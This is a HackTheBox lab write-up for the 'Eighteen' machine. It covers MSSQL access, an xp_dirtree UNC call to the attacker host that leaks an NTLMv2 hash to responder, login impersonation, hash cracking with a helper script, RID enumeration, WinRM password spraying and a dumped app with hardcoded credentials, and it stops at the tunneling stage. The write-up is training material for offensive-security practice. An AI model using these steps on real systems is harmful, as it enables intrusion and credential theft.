
HackTheBox - Eighteen

Eighteen exposes an MSSQL service in which we discover credentials that grant access over WinRM. ligolo was run to expose the host's local ports. While enumerating the user's permissions, an Active Directory permission misconfiguration was identified that allowed the BadSuccessor attack, achieving privilege escalation.

Name Eighteen
OS Windows
Points 20
Difficulty Easy
Release Date 2025-11-15
IP 10.129.121.22
Maker kavigihan


Machine Information: Certified

The machine description emulates a "real" pentest scenario by providing a set of starting credentials.

As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!

Recon

nmap

nmap shows several open ports: http (80), mssql (1433) and winrm (5985).

# Nmap 7.95 scan initiated Sat Nov 15 14:13:40 2025 as: /usr/lib/nmap/nmap --privileged -p80,1433,5985 -sV -sC -oN nmap_scan 10.129.121.22
Nmap scan report for 10.129.121.22
Host is up (0.066s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info: 
|   10.129.121.22:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-16T02:45:47
|_Not valid after:  2055-11-16T02:45:47
| ms-sql-ntlm-info: 
|   10.129.121.22:1433: 
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
|_ssl-date: 2025-11-16T03:13:55+00:00; +7h00m01s from scanner time.
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 15 14:13:54 2025 -- 1 IP address (1 host up) scanned in 13.96 seconds

We add eighteen.htb and dc01.eighteen.htb to our /etc/hosts file.

Service Access

The credentials grant access to MSSQL (SQL authentication, hence --local-auth).

❯ netexec mssql eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
MSSQL       10.129.121.22   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.121.22   1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 

Web Site

The response headers indicate a Microsoft IIS server.

❯ curl -sI eighteen.htb
HTTP/1.1 200 OK
Content-Length: 2253
Content-Type: text/html; charset=utf-8
Vary: Cookie
Server: Microsoft-IIS/10.0
Date: Sun, 16 Nov 2025 04:48:22 GMT

The site has a financial-planning theme.

image

It explains how the service works.

image

There are two forms, one for registration and one for login.

image

image

Directory Brute Forcing

feroxbuster shows that /admin exists (it redirects unauthenticated requests to /login, as does /dashboard).

❯ feroxbuster -u http://eighteen.htb/ -w $CM
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://eighteen.htb/
 🚩  In-Scope Url          │ eighteen.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      603l     1072w     9601c http://eighteen.htb/static/css/style.css
200      GET       76l      145w     2421c http://eighteen.htb/register
200      GET       88l      203w     2822c http://eighteen.htb/features
200      GET       66l      121w     1961c http://eighteen.htb/login
200      GET       74l      156w     2253c http://eighteen.htb/
302      GET        5l       22w      199c http://eighteen.htb/admin => http://eighteen.htb/login
302      GET        5l       22w      199c http://eighteen.htb/dashboard => http://eighteen.htb/login
302      GET        5l       22w      189c http://eighteen.htb/logout => http://eighteen.htb/
404      GET       29l       95w     1245c http://eighteen.htb/lost+found
404      GET       29l       95w     1245c http://eighteen.htb/web.config
[####################] - 8s      4622/4622    0s      found:10      errors:0      
[####################] - 8s      4614/4614    593/s   http://eighteen.htb/

User Register

We registered a user.

image

Nothing relevant was found on the site.

image

MSSQL

We connect to MSSQL with the initial credentials. Note that kevin maps to the guest database user.

❯ impacket-mssqlclient -dc-ip 10.129.121.22 -p 1433 kevin:'iNa2we6haRj2gaw!'@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (kevin  guest@master)> select user_name();
        
-----   
guest   

SQL (kevin  guest@master)>

Grab the Hash

We use xp_dirtree to obtain the hash of the svc user: pointing it at a UNC path on our host makes the SQL Server service account authenticate to us.

SQL (kevin  guest@master)> xp_dirtree \\10.10.14.64\sc\
subdirectory   depth   file   
------------   -----   ----   
SQL (kevin  guest@master)>

responder shows the user mssqlsvc along with its NTLMv2 hash.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.121.22
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:8fbce4abfccb[...]

Cracking the Hash

After attempting to crack the hash, the password was not found in the rockyou wordlist.

❯ john SMB-NTLMv2-SSP-10.129.121.22.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 DONE (2025-11-15 15:26) 0g/s 2066Kp/s 4133Kc/s 4133KC/s !)(OPPQR..*7¡Vamos!
Session completed. 

DB Access

We find that the database financial_planner exists; however, kevin does not have access to it.

SQL (kevin  guest@master)> enum_db
name                is_trustworthy_on   
-----------------   -----------------   
master                              0   

tempdb                              0   

model                               0   

msdb                                1   

financial_planner                   0   

SQL (kevin  guest@master)> use financial_planner
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
SQL (kevin  guest@master)>

enum_logins shows that a login exists for appdev. We use exec_as_login with this login to gain access to the database; this only works because kevin holds the IMPERSONATE permission on the appdev login.

SQL (kevin  guest@master)> enum_logins
name     type_desc   is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
------   ---------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa       SQL_LOGIN             0          1               0             0            0              0           0           0           0   

kevin    SQL_LOGIN             0          0               0             0            0              0           0           0           0   

appdev   SQL_LOGIN             0          0               0             0            0              0           0           0           0   

SQL (kevin  guest@master)> exec_as_login appdev
SQL (appdev  appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev  appdev@financial_planner)>

There is a users table, and inside it we find the password hash for the admin user.

SQL (appdev  appdev@financial_planner)> SELECT name FROM sys.tables WHERE type_desc = 'USER_TABLE';
name          
-----------   
users         

incomes       

expenses      

allocations   

analytics     

visits        

SQL (appdev  appdev@financial_planner)> select * from users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at   
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------   
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03   

SQL (appdev  appdev@financial_planner)>

Cracking the Hash

We format the hash the same way as in HTB - Titanic so that hashcat (mode 10900) can consume it: the iteration count is kept, and the salt and the digest are base64-encoded.

# pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
# echo -n matters: a trailing newline would be base64-encoded into the salt and the hash would never crack
digest=$(echo -n "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133" | xxd -r -p | base64); salt=$(echo -n "AMtzteQIG7yAbZIa" | base64); echo "sha256:600000:${salt}:${digest}"
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=

We run hashcat with the rockyou.txt wordlist against the formatted hash. It reveals the plaintext password.

PS C:\Users\user\Documents\github\hashcat-7.1.2> ./hashcat.exe -m 10900 'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=' rockyou.txt
hashcat (v7.1.2) starting

# [.. cut ..]

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7Gd...yIcTM=
Time.Started.....: Sat Nov 15 16:48:33 2025 (9 secs)
Time.Estimated...: Sat Nov 15 16:48:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:     2780 H/s (7.33ms) @ Accel:2 Loops:500 Thr:512 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599500-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> 280789
Hardware.Mon.#01.: Temp: 59c Fan: 30% Util: 99% Core:2760MHz Mem:8251MHz Bus:8

Started: Sat Nov 15 16:48:32 2025
Stopped: Sat Nov 15 16:48:43 2025
PS C:\Users\user\Documents\github\hashcat-7.1.2>
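The conversion and the crack result, as an added Python example (not code from the writeup): it parses the Werkzeug pbkdf2 string taken from the users table, emits the hashcat -m 10900 form, and re-derives the digest for a candidate password the way Werkzeug's check_password_hash does, so the iloveyou1 result above can be confirmed offline without hashcat.

```python
"""Convert a Werkzeug PBKDF2 hash to hashcat -m 10900 form and verify a candidate.

Added example, not code from the original writeup. The hash, salt and
iteration count below are the values printed on the page.
"""
import base64
import hashlib
import hmac

# Value taken from the users table on the page (the admin user's password_hash).
WERKZEUG_HASH = (
    "pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
    "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"
)


def parse_werkzeug_pbkdf2(value: str) -> tuple[str, int, str, str]:
    """Split 'pbkdf2:<digest>:<iterations>$<salt>$<hexdigest>' into its parts."""
    method, salt, digest_hex = value.split("$", 2)
    parts = method.split(":")
    # generate_password_hash always writes all three fields for pbkdf2.
    if len(parts) != 3 or parts[0] != "pbkdf2":
        raise ValueError(f"not a Werkzeug pbkdf2 hash: {method}")
    return parts[1], int(parts[2]), salt, digest_hex


def to_hashcat_10900(value: str) -> str:
    """Render as 'sha256:<iterations>:<b64 salt>:<b64 digest>' (hashcat mode 10900).

    Both fields are base64 of the raw bytes, with no trailing newline: the
    common mistake is `echo salt | base64`, which encodes an extra '\\n' and
    yields a hash that hashcat will never crack.
    """
    digest_name, iterations, salt, digest_hex = parse_werkzeug_pbkdf2(value)
    salt_b64 = base64.b64encode(salt.encode()).decode()
    digest_b64 = base64.b64encode(bytes.fromhex(digest_hex)).decode()
    return f"{digest_name}:{iterations}:{salt_b64}:{digest_b64}"


def verify_werkzeug_pbkdf2(value: str, candidate: str) -> bool:
    """Recompute PBKDF2-HMAC the way Werkzeug does and compare in constant time."""
    digest_name, iterations, salt, digest_hex = parse_werkzeug_pbkdf2(value)
    derived = hashlib.pbkdf2_hmac(
        digest_name, candidate.encode("utf-8"), salt.encode("utf-8"), iterations
    )
    return hmac.compare_digest(derived.hex(), digest_hex)


if __name__ == "__main__":
    print("hashcat input:", to_hashcat_10900(WERKZEUG_HASH))
    for guess in ("iloveyou", "iloveyou1"):
        print(f"{guess!r:14} -> {verify_werkzeug_pbkdf2(WERKZEUG_HASH, guess)}")
```

The 600000 iterations are what makes each guess cost a few milliseconds; the weakness here is the password, not the hash construction.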

Admin - Website

The recovered credentials give access to the site's admin dashboard.

image

The site shows only one registered user.

image

Enumerating Users

We use the Metasploit auxiliary module mssql_enum_domain_accounts to enumerate domain accounts through MSSQL: it obtains the domain SID and resolves candidate RIDs to names via the SQL Server.

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > show options

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   FuzzNum              10000             yes       Number of principal_ids to fuzz.
   PASSWORD             iNa2we6haRj2gaw!  no        The password for the specified username
   RHOSTS               eighteen.htb      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433              yes       The target port (TCP)
   USERNAME             kevin             no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentication (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.129.78.214
[*] 10.129.78.214:1433 - Attempting to connect to the database server at 10.129.78.214:1433 as kevin...
[+] 10.129.78.214:1433 - Connected.
[*] 10.129.78.214:1433 - SQL Server Name: DC01
[*] 10.129.78.214:1433 - Domain Name: EIGHTEEN
[+] 10.129.78.214:1433 - Found the domain sid: 010500000000000515000000dfdeac44d4131d236f599b76
[*] 10.129.78.214:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.129.78.214:1433 -  - EIGHTEEN\Administrator
[*] 10.129.78.214:1433 -  - EIGHTEEN\Guest
[*] 10.129.78.214:1433 -  - EIGHTEEN\krbtgt
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Users
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Guests
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Computers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Controllers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Cert Publishers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Schema Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Enterprise Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Group Policy Creator Owners
[*] 10.129.78.214:1433 -  - EIGHTEEN\Read-only Domain Controllers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Cloneable Domain Controllers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Protected Users
[*] 10.129.78.214:1433 -  - EIGHTEEN\Key Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Enterprise Key Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Forest Trust Accounts
[*] 10.129.78.214:1433 -  - EIGHTEEN\External Trust Accounts
[*] 10.129.78.214:1433 -  - EIGHTEEN\RAS and IAS Servers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Allowed RODC Password Replication Group
[*] 10.129.78.214:1433 -  - EIGHTEEN\Denied RODC Password Replication Group
[*] 10.129.78.214:1433 -  - EIGHTEEN\DC01$
[*] 10.129.78.214:1433 -  - EIGHTEEN\DnsAdmins
[*] 10.129.78.214:1433 -  - EIGHTEEN\DnsUpdateProxy
[*] 10.129.78.214:1433 -  - EIGHTEEN\mssqlsvc
[*] 10.129.78.214:1433 -  - EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
[*] 10.129.78.214:1433 -  - EIGHTEEN\HR
[*] 10.129.78.214:1433 -  - EIGHTEEN\IT
[*] 10.129.78.214:1433 -  - EIGHTEEN\Finance
[*] 10.129.78.214:1433 -  - EIGHTEEN\jamie.dunn
[*] 10.129.78.214:1433 -  - EIGHTEEN\jane.smith
[*] 10.129.78.214:1433 -  - EIGHTEEN\alice.jones
[*] 10.129.78.214:1433 -  - EIGHTEEN\adam.scott
[*] 10.129.78.214:1433 -  - EIGHTEEN\bob.brown
[*] 10.129.78.214:1433 -  - EIGHTEEN\carol.white
[*] 10.129.78.214:1433 -  - EIGHTEEN\dave.green
[+] 10.129.78.214:1433 - 38 user accounts, groups, and computer accounts were found.
[*] 10.129.78.214:1433 - Query results have been saved to: /home/kali/.msf4/loot/20251115170845_default_10.129.78.214_mssql.domain.acc_504033.txt
[*] Auxiliary module execution completed
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) >

We build a wordlist from the users and groups found.

❯ cat /home/kali/.msf4/loot/20251115170845_default_10.129.78.214_mssql.domain.acc_504033.txt | grep EIGHTEEN | cut -d '\' -f2 | cut -d '"' -f1  > user_group.txt
❯ wc -l user_group.txt
37 user_group.txt

Password Spraying

We run netexec against WinRM with the user/group list and the password recovered earlier, and get one accepted pair: adam.scott reuses the web admin's password.

❯ netexec winrm eighteen.htb -u user_group.txt -p 'iloveyou1' 2>/dev/null | grep '[+]'
WINRM                    10.129.78.214   5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

User - Adam.Scott

We run winrmexec with the credentials, gaining access to the machine and the user.txt flag.

❯ python ../winrmexec/winrmexec.py -dc-ip 10.129.78.214 adam.scott:iloveyou1@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] '-target_ip' not specified, using eighteen.htb
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://eighteen.htb:5985/wsman
PS C:\Users\adam.scott\Documents> whoami
eighteen\adam.scott
PS C:\Users\adam.scott\Documents> cat ../Desktop/user.txt
62afe8508a58357cac88b1a98954f6a6
PS C:\Users\adam.scott\Documents>

Web App - Source Code

In C:\inetpub\eighteen.htb we find the site's source code.

PS C:\> dir -force inetpub/eighteen.htb


    Directory: C:\inetpub\eighteen.htb


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----        10/27/2025   1:12 PM                static                                                                
d-----         11/8/2025   6:29 AM                templates                                                             
-a----         11/8/2025   6:49 AM          10646 app.py                                                                
-a----        10/27/2025   1:15 PM             57 requirements.txt                                                      
-a----        11/10/2025  12:18 PM            611 web.config                                                            


PS C:\>

app.py contains a hardcoded pair of database credentials (appdev:MissThisElite$90), the same appdev login we impersonated earlier through MSSQL.

from flask import Flask, render_template, request, redirect, url_for, session, flash
from werkzeug.security import generate_password_hash, check_password_hash
from functools import wraps
import pyodbc
from datetime import datetime
import os

app = Flask(__name__)
app.secret_key = os.urandom(24)
app.config['SESSION_TYPE'] = 'filesystem'

DB_CONFIG = {
    'server': 'dc01.eighteen.htb',
    'database': 'financial_planner',
    'username': 'appdev',
    'password': 'MissThisElite$90',
    'driver': '{ODBC Driver 17 for SQL Server}',
    'TrustServerCertificate': 'True'
}

def get_db_connection():
    conn_str = f"DRIVER={DB_CONFIG['driver']};SERVER={DB_CONFIG['server']};DATABASE={DB_CONFIG['database']};UID={DB_CONFIG['username']};PWD={DB_CONFIG['password']}"
    return pyodbc.connect(conn_str)

def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('Please log in to access this page.', 'warning')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function

def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('Please log in to access this page.', 'warning')
            return redirect(url_for('login'))

        conn = get_db_connection()
        cursor = conn.cursor()
        cursor.execute("SELECT is_admin FROM users WHERE id = ?", (session['user_id'],))
        user = cursor.fetchone()
        conn.close()

        if not user or not user[0]:
            flash('Access denied. Admin privileges required.', 'danger')
            return redirect(url_for('dashboard'))
        return f(*args, **kwargs)
    return decorated_function

def track_visit(page):
    try:
        conn = get_db_connection()
        cursor = conn.cursor()
        user_agent = request.headers.get('User-Agent', 'Unknown')
        cursor.execute(
            "INSERT INTO visits (user_agent, visited_page, timestamp) VALUES (?, ?, ?)",
            (user_agent, page, datetime.now())
        )
        conn.commit()
        conn.close()
    except:
        pass

@app.route('/')
def index():
    track_visit('/')
    return render_template('index.html')

@app.route('/features')
def features():
    track_visit('/features')
    return render_template('features.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    track_visit('/register')
    if request.method == 'POST':
        full_name = request.form['full_name']
        username = request.form['username']
        email = request.form['email']
        password = request.form['password']

        password_hash = generate_password_hash(password, 'pbkdf2')

        try:
            conn = get_db_connection()
            cursor = conn.cursor()
            cursor.execute(
                "INSERT INTO users (full_name, username, email, password_hash, is_admin, created_at) VALUES (?, ?, ?, ?, 0, ?)",
                (full_name, username, email, password_hash, datetime.now())
            )
            conn.commit()
            conn.close()
            flash('Registration successful! Please log in.', 'success')
            return redirect(url_for('login'))
        except Exception as e:
            flash(f'Registration failed. Username or email may already exist. {e}', 'danger')
            return redirect(url_for('register'))

    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    track_visit('/login')
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']

        conn = get_db_connection()
        cursor = conn.cursor()
        cursor.execute("SELECT id, password_hash, full_name FROM users WHERE username = ?", (username,))
        user = cursor.fetchone()
        conn.close()

        if user and check_password_hash(user[1], password):
            session['user_id'] = user[0]
            session['username'] = username
            session['full_name'] = user[2]
            flash(f'Welcome back, {user[2]}!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('Invalid username or password.', 'danger')

    return render_template('login.html')

@app.route('/logout')
def logout():
    session.clear()
    flash('You have been logged out.', 'info')
    return redirect(url_for('index'))

@app.route('/dashboard')
@login_required
def dashboard():
    track_visit('/dashboard')
    user_id = session['user_id']

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT monthly_salary, yearly_salary FROM incomes WHERE user_id = ? ORDER BY created_at DESC", (user_id,))
    income = cursor.fetchone()

    cursor.execute("SELECT id, category, type, value FROM expenses WHERE user_id = ?", (user_id,))
    expenses = cursor.fetchall()

    cursor.execute("SELECT savings, investments FROM allocations WHERE user_id = ? ORDER BY created_at DESC", (user_id,))
    allocation = cursor.fetchone()

    conn.close()

    monthly_salary = income[0] if income else 0
    yearly_salary = income[1] if income else 0

    total_expenses = 0
    expense_list = []
    for exp in expenses:
        exp_id, category, exp_type, value = exp
        if exp_type == 'fixed':
            amount = value
        else:
            amount = (value / 100) * monthly_salary
        total_expenses += amount
        expense_list.append({
            'id': exp_id,
            'category': category,
            'type': exp_type,
            'value': value,
            'amount': amount
        })

    remaining = monthly_salary - total_expenses
    savings = allocation[0] if allocation else 0
    investments = allocation[1] if allocation else 0

    return render_template('dashboard.html',
                         monthly_salary=monthly_salary,
                         yearly_salary=yearly_salary,
                         expenses=expense_list,
                         total_expenses=total_expenses,
                         remaining=remaining,
                         savings=savings,
                         investments=investments)

@app.route('/update_income', methods=['POST'])
@login_required
def update_income():
    user_id = session['user_id']
    monthly_salary = float(request.form['monthly_salary'])
    yearly_salary = monthly_salary * 12

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT id FROM incomes WHERE user_id = ?", (user_id,))
    existing = cursor.fetchone()

    if existing:
        cursor.execute(
            "UPDATE incomes SET monthly_salary = ?, yearly_salary = ? WHERE user_id = ?",
            (monthly_salary, yearly_salary, user_id)
        )
    else:
        cursor.execute(
            "INSERT INTO incomes (user_id, monthly_salary, yearly_salary, created_at) VALUES (?, ?, ?, ?)",
            (user_id, monthly_salary, yearly_salary, datetime.now())
        )

    conn.commit()
    conn.close()

    flash('Income updated successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/add_expense', methods=['POST'])
@login_required
def add_expense():
    user_id = session['user_id']
    category = request.form['category']
    exp_type = request.form['type']
    value = float(request.form['value'])

    conn = get_db_connection()
    cursor = conn.cursor()
    cursor.execute(
        "INSERT INTO expenses (user_id, category, type, value, created_at) VALUES (?, ?, ?, ?, ?)",
        (user_id, category, exp_type, value, datetime.now())
    )
    conn.commit()
    conn.close()

    flash('Expense added successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/delete_expense/<int:expense_id>', methods=['POST'])
@login_required
def delete_expense(expense_id):
    user_id = session['user_id']

    conn = get_db_connection()
    cursor = conn.cursor()
    cursor.execute("DELETE FROM expenses WHERE id = ? AND user_id = ?", (expense_id, user_id))
    conn.commit()
    conn.close()

    flash('Expense deleted successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/update_allocation', methods=['POST'])
@login_required
def update_allocation():
    user_id = session['user_id']
    savings = float(request.form['savings'])
    investments = float(request.form['investments'])

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT id FROM allocations WHERE user_id = ?", (user_id,))
    existing = cursor.fetchone()

    if existing:
        cursor.execute(
            "UPDATE allocations SET savings = ?, investments = ? WHERE user_id = ?",
            (savings, investments, user_id)
        )
    else:
        cursor.execute(
            "INSERT INTO allocations (user_id, savings, investments, created_at) VALUES (?, ?, ?, ?)",
            (user_id, savings, investments, datetime.now())
        )

    conn.commit()
    conn.close()

    flash('Allocation updated successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/admin')
@admin_required
def admin():
    track_visit('/admin')

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT COUNT(*) FROM users")
    total_users = cursor.fetchone()[0]

    cursor.execute("SELECT COUNT(*) FROM visits")
    total_visits = cursor.fetchone()[0]

    cursor.execute("SELECT COUNT(*) FROM expenses")
    total_expenses_count = cursor.fetchone()[0]
    avg_expenses = total_expenses_count / total_users if total_users > 0 else 0

    cursor.execute("SELECT AVG(savings), AVG(investments) FROM allocations")
    allocation_avg = cursor.fetchone()
    avg_savings = allocation_avg[0] if allocation_avg[0] else 0
    avg_investments = allocation_avg[1] if allocation_avg[1] else 0

    cursor.execute("SELECT category, COUNT(*) as count FROM expenses GROUP BY category ORDER BY count DESC")
    top_categories = cursor.fetchall()[:5]

    cursor.execute("SELECT full_name, username, email, created_at FROM users ORDER BY created_at DESC")
    recent_users = cursor.fetchall()[:5]

    conn.close()

    return render_template('admin.html',
                         total_users=total_users,
                         total_visits=total_visits,
                         avg_expenses=avg_expenses,
                         avg_savings=avg_savings,
                         avg_investments=avg_investments,
                         top_categories=top_categories,
                         recent_users=recent_users)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

Tunneling

Locally we observe that other ports are open.

PS C:\Users\adam.scott\Documents> netstat -ano | findstr /v UDP

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       396
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       396
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2684
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2560
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1160
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1440
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49680          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49681          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49684          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49689          0.0.0.0:0              LISTENING       808
  TCP    0.0.0.0:49703          0.0.0.0:0              LISTENING       2656
